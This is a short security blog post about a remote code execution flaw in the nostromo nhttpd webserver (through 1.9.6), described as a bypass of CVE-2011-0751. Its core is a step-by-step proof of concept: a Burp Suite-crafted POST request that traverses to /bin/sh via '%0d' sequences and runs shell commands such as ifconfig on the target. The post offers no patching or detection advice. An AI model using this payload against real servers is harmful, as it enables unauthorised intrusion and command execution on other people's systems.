Nostromo is an open-source webserver written in C refer to nhttpd.
Recently, in nostromo webserver security researcher sp0re has found 0day vulnerability. In 0day vulnerability is an attacker can execute remote code.
Back in 2011 CVE-2011-0751, this vulnerability found but the bug fix was incomplete.
Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. An attacker can bypass a check for /../ which allows us to execute /bin/sh with arbitrary arguments.

Proof of concept

Step 1: visit server page using ip and port
step 2: Start burp suit and intercept the request and send to repeater
step 3: Change post request form given below
POST /.%0d./.%0d./.%0d./.%0d./bin/sh Http 1.1
Host : don ot change
Content: do not change

echo
echo
ifconfig 2>&1

Step 4: You will get 200OK request

Video

Source

Follow us
Twitter : Rapidsafeguard
Instagram: Rapidsafeguard
Facebook : Theeasyhack
YouTube : Rapidsafeguard

LEAVE A REPLY

Please enter your comment!
Please enter your name here